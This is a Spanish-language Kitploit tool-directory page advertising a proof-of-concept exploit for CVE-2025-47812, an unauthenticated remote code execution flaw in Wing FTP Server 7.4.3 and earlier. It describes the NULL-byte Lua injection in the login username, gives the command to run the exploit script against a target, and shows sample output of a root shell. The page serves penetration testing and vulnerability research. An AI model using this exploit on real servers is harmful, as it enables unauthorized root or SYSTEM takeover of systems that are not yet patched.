Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-47812-Wing-FTP-Server-7.4.3-Unauthenticated-RCE-PoC — Prueba de concepto del exploit para CVE-2025-47812: ejecución remota de código no autenticada en Wing FTP Server <= 7.4.3 mediante inyección de byte NULL en el parámetro de nombre de usuario, que proporciona acceso a shell root/SYSTEM. | Kitploit
Herramientas/GitHubGitHub/estebanzarate/cve-2025-47812-wing-ftp-server-7.4.3-unauthenticated-rce-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubestebanzarate/cve-2025-47812-wing-ftp-server-7.4.3-unauthenticated-rce-poc

CVE-2025-47812-Wing-FTP-Server-7.4.3-Unauthenticated-RCE-PoC

Prueba de concepto del exploit para CVE-2025-47812: ejecución remota de código no autenticada en Wing FTP Server <= 7.4.3 mediante inyección de byte NULL en el parámetro de nombre de usuario, que proporciona acceso a shell root/SYSTEM.

Ver Repositorio
21hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-47812 — Wing FTP Server <= 7.4.3 RCE no autenticado (PoC)

Vulnerabilidad de ejecución remota de código no autenticada en Wing FTP Server <= 7.4.3. Un byte NULL inyectado en el parámetro username durante el inicio de sesión provoca que se escriba código Lua en el archivo de sesión. Cuando se accede a /dir.html con la cookie de sesión resultante, el código inyectado se ejecuta — como root en Linux o SYSTEM en Windows.


Cómo funciona

  1. Una solicitud POST manipulada a /loginok.html inyecta un byte NULL seguido de código Lua en el campo username.
  2. El servidor crea un archivo de sesión que contiene el nombre de usuario no sanitizado (incluyendo la carga útil Lua).
  3. Una solicitud GET a /dir.html con la cookie UID devuelta desencadena la ejecución del código Lua inyectado.
  4. El script cierra sesión entre comandos para evitar alcanzar el límite de sesiones concurrentes del servidor.

Requisitos

  • Python 3
  • Instalar dependencias:
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit

Uso

root@kitploit:~
python3 exploit.py -u http://TARGET

Ejemplo:

root@kitploit:~
$ python3 exploit.py -u http://10.10.10.10
[*] Targeting http://10.10.10.10
[*] Logging in with injected payload...
[*] Triggering payload...
[+] Target is vulnerable! Command output:
uid=0(root) gid=0(root) groups=0(root)

[+] Shell opened. Type 'exit' or Ctrl+C to quit.

Shell> whoami
root

Referencias

  • CVE-2025-47812
  • Wing FTP Server 7.4.4 lanzamiento (corrección)
  • PoC original por 4m3rr0r

Créditos

  • Descubrimiento y exploit original: Sheikh Mohammad Hasan alias 4m3rr0r
  • Limpieza y simplificación: Esteban Zárate
Descargar herramienta